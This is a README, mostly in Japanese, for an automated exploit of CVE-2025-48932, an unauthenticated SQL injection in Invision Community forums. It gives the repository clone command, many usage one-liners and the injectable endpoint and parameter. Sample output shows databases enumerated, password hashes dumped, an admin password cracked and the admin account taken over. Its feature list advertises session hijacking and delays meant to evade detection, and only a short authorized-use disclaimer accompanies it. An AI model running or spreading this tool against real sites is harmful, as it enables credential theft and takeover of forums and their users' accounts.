
CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna
CVE-2025-48932 は、Invision Community バージョン ≤ 4.7.20 で発見された認証を必要としない重大なブラインドSQLインジェクション脆弱性です。このエクスプロイトにより、リモートの攻撃者は以下を実行できます:
$ python3 exploit.py -u https://vulnerable-site.com -v
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2025-48932 - Invision Community SQL Injection ║
║ Author: Sudeepa Wanigarathna ║
║ Critical: Unauthenticated Remote Code Execution ║
╚══════════════════════════════════════════════════════════════════╝
[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!
[*] Enumerating database information...
[+] Database Information:
Version: 10.4.32-MariaDB
User: invision@localhost
Database: invision_community
Hostname: localhost
Basedir: /usr/
Datadir: /var/lib/mysql/
[*] Enumerating databases...
[+] Found 5 databases
Found: information_schema
Found: invision_community
Found: mysql
Found: performance_schema
Found: phpmyadmin
[*] Enumerating tables in invision_community...
[+] Found 12 tables
Found: core_members
Found: core_sessions
Found: admin_members
Found: cms_categories
Found: forums_posts
...
[*] Searching for credentials...
[+] Found credential table: core_members
Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...
[*] Extracting admin information...
[+] Admin Information Found:
name: admin
email: [email protected]
id: 1
password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...
[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!
[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!
[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json
{
"target": "https://vulnerable-site.com",
"timestamp": "2026-08-02T12:34:56.789Z",
"vulnerable": true,
"database": {
"version": "10.4.32-MariaDB",
"user": "invision@localhost",
"database": "invision_community",
"hostname": "localhost"
},
"databases": [
"information_schema",
"invision_community",
"mysql",
"performance_schema",
"phpmyadmin"
],
"tables": [
"core_members",
"core_sessions",
"admin_members"
],
"credentials": [
{
"username": "admin",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
"email": "[email protected]"
}
],
"admin_info": {
"name": "admin",
"email": "[email protected]",
"id": "1",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
},
"summary": {
"total_databases": 5,
"total_tables": 12,
"total_credentials": 3,
"vulnerable": true,
"successful": true
}
}
# リポジトリをクローン
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit
# インストールする依存関係はありません!実行するだけです。
# ターゲットが脆弱かどうかを確認
python3 exploit.py -u https://example.com --check-only
# 冗長出力による完全なエクスプロイト
python3 exploit.py -u https://example.com -v
# プロキシ使用(Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v
# 結果をカスタムファイルに保存
python3 exploit.py -u https://example.com -o results.json
# マルチスレッド抽出(より高速)
python3 exploit.py -u https://example.com -t 10
# 利用可能なすべてのデータをダンプ
python3 exploit.py -u https://example.com --dump-all
# パスワードクラッキング用のカスタムワードリストを使用
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v
# サイレントモード(出力なし、レポートのみ)
python3 exploit.py -u https://example.com -o silent_report.json
# 詳細なエラーを表示するデバッグモード
python3 exploit.py -u https://example.com -v --debug
✅ 外部依存関係なし!
✅ Pure Python標準ライブラリのみ!
✅ pip installや仮想環境は不要!
# 人気のワードリストをダウンロード
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
/applications/calendar/modules/front/calendar/view.phpIPS\calendar\modules\front\calendar\view::search()location(ユーザー指定の入力)GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]
このツールは教育目的および許可されたテスト目的専用です。
このツールを使用することにより、以下に同意したものとみなされます:
コンピュータシステムへの不正アクセスは違法かつ非倫理的です。
invision_exploit_report_[timestamp].json
├── target # 対象URL
├── timestamp # エクスプロイト実行日時
├── vulnerable # 脆弱性ステータス
├── database # データベース情報
├── databases # データベース一覧
├── tables # テーブル一覧
├── credentials # 抽出された認証情報
├── admin_info # 管理者ユーザー情報
└── summary # エクスプロイト概要
問題: 接続タイムアウト
# 解決策: タイムアウトを延長するか、ネットワークを確認してください
python3 exploit.py -u https://example.com --timeout 60
問題: SSL証明書エラー
# 解決策: SSL検証を無効化(本番環境では推奨されません)
python3 exploit.py -u https://example.com --no-verify-ssl
問題: レート制限が検出された
# 解決策: スレッド数を減らし、遅延を増やす
python3 exploit.py -u https://example.com -t 2 --delay 2
問題: 脆弱なパラメータが見つからない
# 解決策: カレンダーアプリがインストールされ、GeoLocationが有効であることを確認
# 確認: /applications/calendar/modules/front/calendar/view.php が存在する
貢献を歓迎します!貢献ガイドラインをご覧ください。
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)セキュリティ研究者&バグバウンティハンター
このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
このプロジェクトが役に立った場合、または興味を持った場合:
サイバーセキュリティ研究者 | ソフトウェアエンジニア | CTFエンジニア
このプロジェクトは、セキュリティ研究、防御的分析、および許可されたペネトレーションテストのために提供されています。ユーザーは、適用されるすべての法律を遵守し、使用前に適切な許可を取得する責任があります。
| 機能 | 説明 | ステータス |
|---|
| 🚀 依存関係ゼロ | Pure Python標準ライブラリのみ - pip install不要 | ✅ |
| ⚡ マルチスレッド | 設定可能なスレッド数による超高速データ抽出 | ✅ |
| 🤖 完全自動化 | 検出からレポート作成までの完全なエクスプロイトチェーン | ✅ |
| 👑 管理者乗っ取り | セッションハイジャックと権限昇格 | ✅ |
| 🔑 認証情報ダンプ | ユーザー、パスワードハッシュ、メールアドレスの抽出 | ✅ |
| 🔓 パスワードクラッキング | ワードリスト対応の組み込みハッシュクラッキング | ✅ |
| 📋 JSONレポート | 分析とドキュメント作成のための構造化出力 | ✅ |
| 🔌 プロキシサポート | Burp Suiteとカスタムプロキシの統合 | ✅ |
| 🎨 カラー出力 | 進捗インジケータ付きの見やすいターミナル出力 | ✅ |
| 🛡️ レート制限 | 検知を回避するための組み込み遅延 | ✅ |
| 引数 | 説明 | 例 |
|---|
-u, --url | 対象URL(必須) | -u https://example.com |
-p, --proxy | プロキシURL | -p http://127.0.0.1:8080 |
-t, --threads | スレッド数(デフォルト: 5) | -t 10 |
-o, --output | 結果の出力ファイル | -o results.json |
-v, --verbose | 冗長出力を有効にする | -v |
--check-only | 脆弱性の確認のみ行う | --check-only |
--dump-all | 利用可能なすべてのデータをダンプ | --dump-all |
--wordlist | クラッキング用のワードリストファイル | --wordlist rockyou.txt |